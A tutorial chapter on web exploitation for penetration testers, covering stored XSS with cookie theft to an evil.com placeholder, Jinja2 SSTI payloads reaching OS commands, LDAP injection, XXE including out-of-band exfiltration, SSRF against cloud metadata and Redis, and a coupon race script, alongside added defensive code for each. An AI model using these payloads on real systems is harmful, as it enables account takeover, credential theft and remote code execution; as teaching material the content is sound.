Web Exploitation
🔥 Vibe Prompt
"Chain vulnerabilities: XSS → CSRF → account takeover. SSTI to RCE."
Stored XSS to Account Takeover
```javascript
// 1. Inject the payload into a profile field that an admin will later view.
//    The onerror value is quoted so the HTML attribute survives the spaces in the script.
const payload =
  '<img src=x onerror="' +
  "fetch('/api/transfer', {method: 'POST', body: JSON.stringify({to: 'attacker', amount: 1000})})" +
  ".then(r => fetch('https://evil.com/steal?cookie=' + document.cookie))" +
  '">';

fetch('/api/profile', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({name: payload})
});
// 2. Admin views the profile → the stored payload runs in the admin's browser, inside the app's origin
// 3. Forged request: the browser attaches the admin's session cookie to the /api/transfer POST.
//    Because the request comes from the application's own origin, SameSite cookies and
//    Origin/Referer checks do not stop it, and the script can read any anti-CSRF token from the page.
// 4. Cookie theft: document.cookie is exfiltrated, which only works if the session cookie lacks HttpOnly
// Result: full account takeover. The root fix is the XSS itself (context-aware output encoding plus a CSP);
//         HttpOnly and SameSite cookies limit the damage but do not prevent step 3.
```
SSTI (Server-Side Template Injection)
```python
from flask import Flask, request, render_template_string

app = Flask(__name__)

@app.route('/greet')
def greet():
    name = request.args.get('name', 'world')
    # VULNERABLE: user input is spliced into the template *source*, so Jinja2 evaluates it
    return render_template_string(f"<h1>Hello {name}!</h1>")
    # Safe: keep the template static and pass the input as a context variable (auto-escaped):
    #   return render_template_string("<h1>Hello {{ name }}!</h1>", name=name)

# Test payload: ?name={{7*7}}
# Response: Hello 49! → the template engine evaluated the input, SSTI confirmed
# ({{7*'7'}} → 7777777 on Jinja2, 49 on Twig: a quick engine fingerprint)

# RCE payloads (Jinja2): reach the os module through some object's __globals__
# {{config.__class__.__init__.__globals__['os'].popen('id').read()}}
# {{''.__class__.__mro__[1].__subclasses__()[X]('cat /etc/passwd',shell=True,stdout=-1).communicate()}}
#   (X is the index of subprocess.Popen in the list; it differs per Python build, enumerate it first)
# Jinja2 globals that are always in scope, even without Flask's config object:
# {{cycler.__init__.__globals__.os.popen('ls').read()}}
# {{joiner.__init__.__globals__.os.popen('env').read()}}
# Note: Jinja2's SandboxedEnvironment blocks these attribute chains; render_template_string does not use it.
```
LDAP Injection
```python
# Vulnerable search: user input concatenated straight into the filter
search_filter = f"(uid={user_input})"
# Payload: *            → (uid=*) returns every user

# Vulnerable login check, same mistake
login_filter = f"(&(uid={username})(userPassword={password}))"
# Payload for username: admin)(uid=*))(|(uid=*
# Resulting filter:     (&(uid=admin)(uid=*))(|(uid=*)(userPassword=<anything>))
# Many servers evaluate only the first complete filter and ignore the trailing
# junk, so the password clause never applies → authenticated as admin

# Blind LDAP injection: the application's yes/no behaviour becomes an oracle
# (&(uid=admin)(userPassword=*))   → true if the entry exists
# (&(uid=admin)(userPassword=A*))  → true if the value starts with "A"
# Caveat: userPassword normally has no substring matching rule, so the
# character-by-character oracle works on attributes like description or mail,
# not on the password itself
```
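Added example, not code from the original page: the login filter above built with and without RFC 4515 escaping, plus a structural check that shows what the injected username does to the filter. `build_login_filter`, `top_level_groups` and the `(&(uid=...)(userPassword=...))` shape are this example's own assumptions about the application.

```python
# Added example (not from the original page): LDAP filter building with and
# without RFC 4515 escaping, plus a structural check that exposes injection.
from typing import Dict

# RFC 4515 requires these characters to be hex-escaped inside a filter value.
_LDAP_FILTER_ESCAPES: Dict[str, str] = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value: str) -> str:
    """Escape one assertion value for use inside an LDAP search filter."""
    return "".join(_LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter(username: str, password: str, escape: bool = True) -> str:
    """Build the (&(uid=...)(userPassword=...)) filter.

    escape=False reproduces the vulnerable string concatenation from the page.
    """
    if escape:
        username = escape_filter_value(username)
        password = escape_filter_value(password)
    return f"(&(uid={username})(userPassword={password}))"


def top_level_groups(filter_str: str) -> int:
    """Count top-level parenthesised groups.

    A well-formed single filter has exactly one. An injected filter has several
    (the server then silently evaluates only the first) or is unbalanced.
    """
    depth = groups = 0
    for ch in filter_str:
        if ch == "(":
            if depth == 0:
                groups += 1
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                raise ValueError("unbalanced filter: unexpected ')'")
    if depth != 0:
        raise ValueError("unbalanced filter: missing ')'")
    return groups


def is_single_filter(filter_str: str) -> bool:
    """True only when the filter is balanced and consists of one top-level group."""
    try:
        return top_level_groups(filter_str) == 1
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed attacker input (from the page): closes the uid clause, opens a new filter
    evil_user = "admin)(uid=*))(|(uid=*"
    for escape in (False, True):
        f = build_login_filter(evil_user, "wrong", escape=escape)
        print(f"escape={escape!s:5} single_filter={is_single_filter(f)!s:5} {f}")
```

With `escape=False` the filter splits into two top-level groups and the password clause lands in the discarded second one; with escaping, every metacharacter in the username becomes a `\xx` sequence and the filter stays one group that simply fails to match.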
XXE (XML External Entity)
```xml
<?xml version="1.0"?>
<!-- File read: for a parser that resolves external entities and echoes the element back -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

<!-- SSRF via XXE: the parser fetches the URL from the server's network position.
     Shown against IMDSv1; IMDSv2 requires a PUT to obtain a token first, which an entity fetch cannot send -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root>&xxe;</root>

<!-- Blind XXE (out-of-band): nothing is echoed, so the attacker-hosted xxe.dtd
     defines a parameter entity that embeds %file; in a URL fetched from evil.com -->
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://evil.com/xxe.dtd">
  %dtd;
]>
<root/>
```
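Added example, not code from the original page: the defensive side of the three payloads above, using only Python's stdlib `xml.parsers.expat`. The guard refuses any DOCTYPE, entity declaration or external entity reference before expansion can begin, which also shuts the door on billion-laughs style internal entities. `parse_untrusted_xml`, `is_rejected` and the sample documents are constructed for this example.

```python
# Added example (not from the original page): reject DTDs and entity
# declarations before any entity can be expanded, using only the stdlib.
import xml.parsers.expat as expat


class DtdForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE or entity declaration."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML from an untrusted source, refusing any DTD.

    Returns {'tag': root element name, 'text': concatenated character data}.
    Raises DtdForbidden as soon as a DOCTYPE, an entity declaration or an
    external entity reference is seen, so neither XXE nor entity expansion
    attacks get started.
    """
    parser = expat.ParserCreate()
    # Never process parameter entities (the %dtd; in the blind payload above)
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def forbid(*_args):
        raise DtdForbidden("DOCTYPE / entity declarations are not allowed in untrusted XML")

    parser.StartDoctypeDeclHandler = forbid    # <!DOCTYPE ...
    parser.EntityDeclHandler = forbid          # <!ENTITY ...
    parser.ExternalEntityRefHandler = forbid   # &xxe; pointing at SYSTEM "..."

    result = {"tag": None, "text": []}

    def start_element(name, _attrs):
        if result["tag"] is None:
            result["tag"] = name

    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = result["text"].append
    parser.Parse(data, True)   # exceptions raised in handlers propagate out of Parse()
    return {"tag": result["tag"], "text": "".join(result["text"]).strip()}


def is_rejected(data: bytes) -> bool:
    """True when parse_untrusted_xml refuses the document because of a DTD."""
    try:
        parse_untrusted_xml(data)
    except DtdForbidden:
        return True
    return False


# Constructed sample documents: one benign, three carrying the payloads shown above
BENIGN = b"<?xml version='1.0'?><order><id>42</id></order>"
XXE_FILE_READ = (b'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
                 b"<root>&xxe;</root>")
XXE_SSRF = (b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>'
            b"<root>&xxe;</root>")
XXE_BLIND = (b'<!DOCTYPE foo [<!ENTITY % file SYSTEM "file:///etc/passwd">'
             b'<!ENTITY % dtd SYSTEM "http://evil.com/xxe.dtd"> %dtd;]><root/>')

if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN))
    for doc in (XXE_FILE_READ, XXE_SSRF, XXE_BLIND):
        print("rejected:", is_rejected(doc))
```

This is the same strategy `defusedxml` applies (`forbid_dtd`); use that library when it is available, and in other stacks disable DTD processing at the parser (for example `disallow-doctype-decl` in Java's DocumentBuilderFactory) rather than trying to filter the payload text.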
SSRF (Server-Side Request Forgery)
```python
from flask import Flask, request
import requests

app = Flask(__name__)

@app.route('/fetch')
def fetch_url():
    url = request.args.get('url')
    return requests.get(url).text  # VULNERABLE: the server fetches whatever URL the client names

# Attack: the server's network position becomes the attacker's
# /fetch?url=http://169.254.169.254/latest/meta-data/   # AWS metadata (IMDSv1; IMDSv2 needs a PUT token first)
# /fetch?url=http://localhost:9200/                     # Elasticsearch bound to loopback
# /fetch?url=file:///etc/passwd                         # local file read
# /fetch?url=gopher://localhost:6379/_SET%20key%20value # raw Redis protocol; RCE follows when Redis can be
#                                                       # made to write a file (CONFIG SET dir/dbfilename, SAVE)
# Caveat: python-requests only speaks http(s) and raises InvalidSchema for file:// and gopher://;
# those two payloads work against fetchers built on libcurl or other multi-protocol clients.
```
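Added example, not code from the original page: the guard the `/fetch` handler above is missing. It allows only http(s), rejects userinfo tricks, resolves the hostname and refuses any address that is loopback, link-local, private, multicast or otherwise non-global, including the IPv4-mapped IPv6 form of the metadata address. `FAKE_DNS`, the `*.example` hostnames and the resolver hook are constructed so it runs offline; in production `system_resolver` is used.

```python
# Added example (not from the original page): an SSRF guard that validates the
# scheme, resolves the host and refuses non-global targets.
import ipaddress
import socket
from typing import Callable, List, Optional
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
Resolver = Callable[[str], List[str]]


def system_resolver(host: str) -> List[str]:
    """Resolve via the OS resolver; return every A/AAAA address so none can hide."""
    # sockaddr[0] is the address; strip an IPv6 zone id such as fe80::1%eth0
    return sorted({info[4][0].split("%", 1)[0] for info in socket.getaddrinfo(host, None)})


def is_forbidden_ip(addr: str) -> bool:
    """True for any address an outbound fetcher must never reach."""
    ip = ipaddress.ip_address(addr)
    # [::ffff:169.254.169.254] is the metadata address in disguise
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    # not is_global covers loopback, link-local, RFC 1918, 100.64/10, 0.0.0.0/8, ...
    return ip.is_multicast or not ip.is_global


def resolve_safe_target(url: str, resolver: Optional[Resolver] = None) -> List[str]:
    """Return the IPs a fetcher may connect to for url, or raise ValueError.

    Connect to one of the returned IPs (sending the original Host header) and
    follow no redirects: re-resolving at connect time reopens a DNS-rebinding
    window, and a redirect lets a public host point you back inside.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise ValueError("userinfo in URL not allowed")   # http://trusted.example@evil/ tricks
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    try:
        ips = [str(ipaddress.ip_address(host))]          # literal IP, checked directly
    except ValueError:
        # Not a literal IP. Shorthand such as 127.1 or 0x7f000001 ends up here too;
        # the resolver normalises it and the result is checked like any other address.
        ips = (resolver or system_resolver)(host)
    if not ips:
        raise ValueError(f"host does not resolve: {host}")
    for ip in ips:
        if is_forbidden_ip(ip):
            raise ValueError(f"{host} resolves to forbidden address {ip}")
    return ips


def is_safe_url(url: str, resolver: Optional[Resolver] = None) -> bool:
    try:
        resolve_safe_target(url, resolver)
        return True
    except ValueError:
        return False


# Constructed DNS table so the example runs offline and deterministically
FAKE_DNS = {
    "localhost": ["127.0.0.1"],
    "public.example": ["93.184.216.34"],
    "metadata.example": ["169.254.169.254"],
    "rebind.example": ["93.184.216.34", "127.0.0.1"],  # one public, one loopback record
}


def fake_resolver(host: str) -> List[str]:
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for u in ("http://public.example/",
              "http://169.254.169.254/latest/meta-data/",
              "http://localhost:9200/",
              "file:///etc/passwd",
              "gopher://localhost:6379/_SET%20key%20value",
              "http://[::ffff:169.254.169.254]/",
              "http://rebind.example/"):
        print(f"{is_safe_url(u, fake_resolver)!s:5} {u}")
```

Rejecting a name that has even one non-global record is deliberate: a split answer is exactly what a DNS-rebinding setup produces. Where the application only ever needs a handful of destinations, an allowlist of hostnames is stronger than any denylist of addresses.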
Race Condition
```python
import threading
import requests

def use_coupon():
    requests.post("https://target.com/api/coupon/redeem",
                  json={"code": "FREEMONEY"},
                  cookies={"session": "valid_session"})

# Race: fire the same single-use coupon 50x at once, so every request passes the
# "still unused?" check before any of them marks the coupon used
threads = [threading.Thread(target=use_coupon) for _ in range(50)]
for t in threads:
    t.start()
for t in threads:
    t.join()
# If more than one redeem succeeds → race condition confirmed
# (threads started in a loop land spread over a few ms; Burp's single-packet
#  attack over HTTP/2 makes the window much tighter)
# Mitigation: make check-and-act a single step: row lock (SELECT ... FOR UPDATE),
# conditional update (UPDATE ... WHERE used = 0, then verify rowcount == 1),
# or a unique constraint on (user, coupon)
```
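Added example, not code from the original page: a deterministic model of the coupon race. `threading.Barrier` parks every worker inside the check-then-act gap, the way 50 simultaneous requests sit in a real server's request handlers, so the racy store redeems a single coupon 50 times while the store that checks and acts under one lock redeems it once. The store classes and `hammer` are this example's own constructions.

```python
# Added example (not from the original page): a deterministic model of the
# coupon race and of the check-and-act-in-one-step fix.
import threading
from typing import Callable, Iterable

Window = Callable[[], object]


class RacyCouponStore:
    """Check, then act: the gap between the two steps is the vulnerability."""

    def __init__(self, codes: Iterable[str]):
        self.used = {code: False for code in codes}

    def redeem(self, code: str, window: Window = lambda: None) -> bool:
        if self.used.get(code, True):     # 1. check (unknown or already used -> reject)
            return False
        window()                          # 2. DB round-trip / payment call in a real app
        self.used[code] = True            # 3. act
        return True


class AtomicCouponStore:
    """Check and act inside one lock. The database equivalent is
    UPDATE coupons SET used = 1 WHERE code = ? AND used = 0  (and rowcount == 1)."""

    def __init__(self, codes: Iterable[str]):
        self.used = {code: False for code in codes}
        self._lock = threading.Lock()

    def redeem(self, code: str, window: Window = lambda: None) -> bool:
        window()                          # latency outside the critical section is harmless
        with self._lock:
            if self.used.get(code, True):
                return False
            self.used[code] = True
            return True


def hammer(store, code: str, workers: int = 50) -> int:
    """Redeem `code` from `workers` threads at the same instant; return how many succeeded."""
    if code not in store.used:
        raise ValueError("code must exist, otherwise no worker reaches the barrier")
    barrier = threading.Barrier(workers)   # released only once all workers have arrived
    successes = []
    record_lock = threading.Lock()

    def worker():
        ok = store.redeem(code, window=barrier.wait)
        with record_lock:
            successes.append(ok)

    threads = [threading.Thread(target=worker) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(successes)


if __name__ == "__main__":
    print("racy   :", hammer(RacyCouponStore(["FREEMONEY"]), "FREEMONEY"))    # 50
    print("atomic :", hammer(AtomicCouponStore(["FREEMONEY"]), "FREEMONEY"))  # 1
```

The lesson carries over to the database: a `SELECT` followed by a separate `UPDATE` in application code is the racy store, whatever framework sits in between; the conditional `UPDATE ... WHERE used = 0`, a `SELECT ... FOR UPDATE`, or a unique constraint is the lock.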
Common Exploit Chains
| Chain | Impact |
|-------|--------|
| XSS + CSRF | Account takeover |
| SSRF + Cloud metadata | Cloud credential theft |
| XXE + file read | Source code disclosure |
| SSTI + OS command | RCE |
| SQLi + file write | Webshell |
| LFI + log poisoning | RCE |
| Race + balance check | Infinite money |
Best Practices for Testers
- Chain vulnerabilities wherever possible: the combined impact is what gets a finding prioritised
- Document every step (screenshots, raw requests and responses)
- Use Burp Collaborator or another out-of-band listener for blind XXE and SSRF
- Test in several browsers (XSS parsing and built-in filtering differ)
- Check WAF bypass techniques
- Verify findings by manual review; never report unconfirmed scanner output
The Three Major Categories of Web Vulnerabilities
There are hundreds of web vulnerability classes, but around 80% of attacks target a handful of them. The OWASP Top 10 is the essential reference.
Injection Attacks
| Type | Risk | Defence |
|:----|:----|:--------|
| SQL Injection | Read or delete database contents directly | Parameterised queries (prepared statements) |
| NoSQL Injection | Bypass MongoDB authentication | Input validation and strict query filtering (reject client-supplied operator objects such as `$ne`) |
| Command Injection | Execute system commands on the server | Never build shell commands by string concatenation |
| LDAP Injection | Bypass LDAP authentication | Escape filter values |
XSS (Cross-Site Scripting)
XSS lets an attacker run JavaScript in another user's browser. It is one of the most common web vulnerabilities:
| XSS type | Where the payload lives | Scope |
|:--------|:--------|:--------|
| Reflected | URL parameter | Victim must be lured into clicking a link |
| Stored | Database | Fires every time the page is loaded |
| DOM-based | Front-end JavaScript | Bypasses server-side filtering (the payload may never reach the server) |
Next Chapter Preview: Mobile and API Penetration Testing
Web vulnerabilities are only one part of penetration testing. The next chapter extends to mobile apps and RESTful/GraphQL API security testing, the main attack surface of modern SaaS products.